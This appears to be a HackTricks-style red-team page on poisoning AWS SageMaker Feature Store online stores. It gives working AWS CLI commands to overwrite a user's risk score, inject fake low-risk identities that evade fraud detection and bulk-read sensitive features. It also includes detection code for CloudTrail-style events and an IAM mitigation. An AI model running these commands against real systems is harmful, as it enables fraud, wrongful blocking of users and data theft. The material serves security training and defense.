SageMaker Feature Store online store poisoning

tip

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Learn & practice Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

Abuse sagemaker:PutRecord on a Feature Group with OnlineStore enabled to overwrite live feature values consumed by online inference. Combined with sagemaker:GetRecord, an attacker can read sensitive features. This does not require access to models or endpoints.

Requirements

  • Permissions: sagemaker:ListFeatureGroups, sagemaker:DescribeFeatureGroup, sagemaker:PutRecord, sagemaker:GetRecord
  • Target: Feature Group with OnlineStore enabled (typically backing real-time inference)
  • Complexity: LOW - Simple AWS CLI commands, no model manipulation required

Steps

Reconnaissance

  1. List Feature Groups and identify those with OnlineStore enabled
```bash
REGION=${REGION:-us-east-1}
# ListFeatureGroups summaries do not carry OnlineStoreConfig, so confirm each group via describe-feature-group
for NAME in $(aws sagemaker list-feature-groups --region $REGION \
  --query "FeatureGroupSummaries[].FeatureGroupName" --output text); do
  ONLINE=$(aws sagemaker describe-feature-group --region $REGION --feature-group-name "$NAME" \
    --query "OnlineStoreConfig.EnableOnlineStore" --output text)
  [ "$ONLINE" = "True" ] && echo "$NAME"
done
```
  2. Describe a target Feature Group to understand its schema
```bash
FG=<feature-group-name>
aws sagemaker describe-feature-group \
  --region $REGION \
  --feature-group-name "$FG"
```

Note the RecordIdentifierFeatureName, EventTimeFeatureName, and all feature definitions. These are required for crafting valid records.

Attack Scenario 1: Data Poisoning (Overwrite Existing Records)

  1. Read the current legitimate record
```bash
aws sagemaker-featurestore-runtime get-record \
  --region $REGION \
  --feature-group-name "$FG" \
  --record-identifier-value-as-string user-001
```
  2. Poison the record with malicious values using the inline --record parameter
```bash
NOW=$(date -u +%Y-%m-%dT%H:%M:%SZ)

# Example: Change risk_score from 0.15 to 0.99 to block a legitimate user
aws sagemaker-featurestore-runtime put-record \
  --region $REGION \
  --feature-group-name "$FG" \
  --record "[
    {\"FeatureName\": \"entity_id\", \"ValueAsString\": \"user-001\"},
    {\"FeatureName\": \"event_time\", \"ValueAsString\": \"$NOW\"},
    {\"FeatureName\": \"risk_score\", \"ValueAsString\": \"0.99\"},
    {\"FeatureName\": \"transaction_amount\", \"ValueAsString\": \"125.50\"},
    {\"FeatureName\": \"account_status\", \"ValueAsString\": \"POISONED\"}
  ]" \
  --target-stores OnlineStore
```
  3. Verify the poisoned data
```bash
aws sagemaker-featurestore-runtime get-record \
  --region $REGION \
  --feature-group-name "$FG" \
  --record-identifier-value-as-string user-001
```

Impact: ML models consuming this feature will now see risk_score=0.99 for a legitimate user, potentially blocking their transactions or services.

Attack Scenario 2: Malicious Data Injection (Create Fraudulent Records)

Inject completely new records with manipulated features to evade security controls:

```bash
NOW=$(date -u +%Y-%m-%dT%H:%M:%SZ)

# Create fake user with artificially low risk to perform fraudulent transactions
aws sagemaker-featurestore-runtime put-record \
  --region $REGION \
  --feature-group-name "$FG" \
  --record "[
    {\"FeatureName\": \"entity_id\", \"ValueAsString\": \"user-999\"},
    {\"FeatureName\": \"event_time\", \"ValueAsString\": \"$NOW\"},
    {\"FeatureName\": \"risk_score\", \"ValueAsString\": \"0.01\"},
    {\"FeatureName\": \"transaction_amount\", \"ValueAsString\": \"999999.99\"},
    {\"FeatureName\": \"account_status\", \"ValueAsString\": \"approved\"}
  ]" \
  --target-stores OnlineStore
```

Verify the injection:

```bash
aws sagemaker-featurestore-runtime get-record \
  --region $REGION \
  --feature-group-name "$FG" \
  --record-identifier-value-as-string user-999
```

Impact: Attacker creates a fake identity with low risk score (0.01) that can perform high-value fraudulent transactions without triggering fraud detection.

Attack Scenario 3: Sensitive Data Exfiltration

Read multiple records to extract confidential features and profile model behavior:

```bash
# Exfiltrate data for known users
for USER_ID in user-001 user-002 user-003 user-999; do
  echo "Exfiltrating data for ${USER_ID}:"
  aws sagemaker-featurestore-runtime get-record \
    --region $REGION \
    --feature-group-name "$FG" \
    --record-identifier-value-as-string ${USER_ID}
done
```

Impact: Confidential features (risk scores, transaction patterns, personal data) exposed to attacker.
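Defender-side detection for the three scenarios above, as an added example that is not part of the original page. It runs over constructed CloudTrail-style events (the field layout, account id, role names and the writer allow-list are assumptions; confirm that your trail actually captures the Feature Store runtime calls) and flags online-store PutRecord calls from non-allow-listed principals as well as bulk GetRecord enumeration by one principal.

```python
# Constructed sample CloudTrail-style events (assumed field layout, not captured data).
EVENTS = [
    {"eventName": "PutRecord", "userIdentity": {"arn": "arn:aws:iam::111122223333:role/feature-ingest"},
     "requestParameters": {"featureGroupName": "fraud-features", "targetStores": ["OnlineStore"]}},
    {"eventName": "PutRecord", "userIdentity": {"arn": "arn:aws:iam::111122223333:role/dev-sandbox"},
     "requestParameters": {"featureGroupName": "fraud-features", "targetStores": ["OnlineStore"]}},
    {"eventName": "PutRecord", "userIdentity": {"arn": "arn:aws:iam::111122223333:role/dev-sandbox"},
     "requestParameters": {"featureGroupName": "fraud-features", "targetStores": ["OfflineStore"]}},
] + [
    {"eventName": "GetRecord", "userIdentity": {"arn": "arn:aws:iam::111122223333:role/dev-sandbox"},
     "requestParameters": {"featureGroupName": "fraud-features",
                           "recordIdentifierValueAsString": f"user-{i:03d}"}}
    for i in range(1, 6)
]

# Assumed allow-list: the only principals that may write to each production feature group.
ALLOWED_WRITERS = {"fraud-features": {"arn:aws:iam::111122223333:role/feature-ingest"}}


def _fg(ev):
    return ev.get("requestParameters", {}).get("featureGroupName")


def _arn(ev):
    return ev.get("userIdentity", {}).get("arn")


def unauthorized_online_writes(events, allowed=ALLOWED_WRITERS):
    """PutRecord calls that reach the online store from a principal outside the allow-list.
    A missing targetStores means the API default, which writes to every enabled store."""
    hits = []
    for ev in events:
        if ev.get("eventName") != "PutRecord":
            continue
        stores = ev.get("requestParameters", {}).get("targetStores") or ["OnlineStore", "OfflineStore"]
        if "OnlineStore" in stores and _arn(ev) not in allowed.get(_fg(ev), set()):
            hits.append((_arn(ev), _fg(ev)))
    return hits


def read_bursts(events, threshold=3):
    """Principals that read `threshold` or more distinct record identifiers from one feature
    group: the enumeration pattern behind bulk feature exfiltration (Scenario 3)."""
    seen = {}
    for ev in events:
        if ev.get("eventName") == "GetRecord":
            key = (_arn(ev), _fg(ev))
            seen.setdefault(key, set()).add(ev["requestParameters"].get("recordIdentifierValueAsString"))
    return {key: len(ids) for key, ids in seen.items() if len(ids) >= threshold}
```

The same allow-list is the mitigation: scope sagemaker:PutRecord on production feature group ARNs to the ingestion role only, so an over-privileged sandbox principal cannot write to the online store in the first place.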

Testing/Demo Feature Group Creation (Optional)

If you need to create a test Feature Group:

```bash
REGION=${REGION:-us-east-1}
# Pick the first existing feature group with the online store enabled (summaries do not expose OnlineStoreConfig)
FG=""
for NAME in $(aws sagemaker list-feature-groups --region $REGION --query "FeatureGroupSummaries[].FeatureGroupName" --output text); do
  ONLINE=$(aws sagemaker describe-feature-group --region $REGION --feature-group-name "$NAME" --query "OnlineStoreConfig.EnableOnlineStore" --output text)
  [ "$ONLINE" = "True" ] && FG=$NAME && break
done
if [ -z "$FG" ]; then
  ACC=$(aws sts get-caller-identity --query Account --output text)
  FG=test-fg-$ACC-$(date +%s)
  ROLE_ARN=$(aws iam get-role --role-name AmazonSageMaker-ExecutionRole --query Role.Arn --output text 2>/dev/null || echo arn:aws:iam::$ACC:role/service-role/AmazonSageMaker-ExecutionRole)

  aws sagemaker create-feature-group \
    --region $REGION \
    --feature-group-name "$FG" \
    --record-identifier-feature-name entity_id \
    --event-time-feature-name event_time \
    --feature-definitions "[
      {\"FeatureName\":\"entity_id\",\"FeatureType\":\"String\"},
      {\"FeatureName\":\"event_time\",\"FeatureType\":\"String\"},
      {\"FeatureName\":\"risk_score\",\"FeatureType\":\"Fractional\"},
      {\"FeatureName\":\"transaction_amount\",\"FeatureType\":\"Fractional\"},
      {\"FeatureName\":\"account_status\",\"FeatureType\":\"String\"}
    ]" \
    --online-store-config "{\"EnableOnlineStore\":true}" \
    --role-arn "$ROLE_ARN"

  echo "Waiting for feature group to be in Created state..."
  for i in $(seq 1 40); do
    ST=$(aws sagemaker describe-feature-group --region $REGION --feature-group-name "$FG" --query FeatureGroupStatus --output text || true)
    echo "$ST"; [ "$ST" = "Created" ] && break; sleep 15
  done
fi

echo "Feature Group ready: $FG"
```
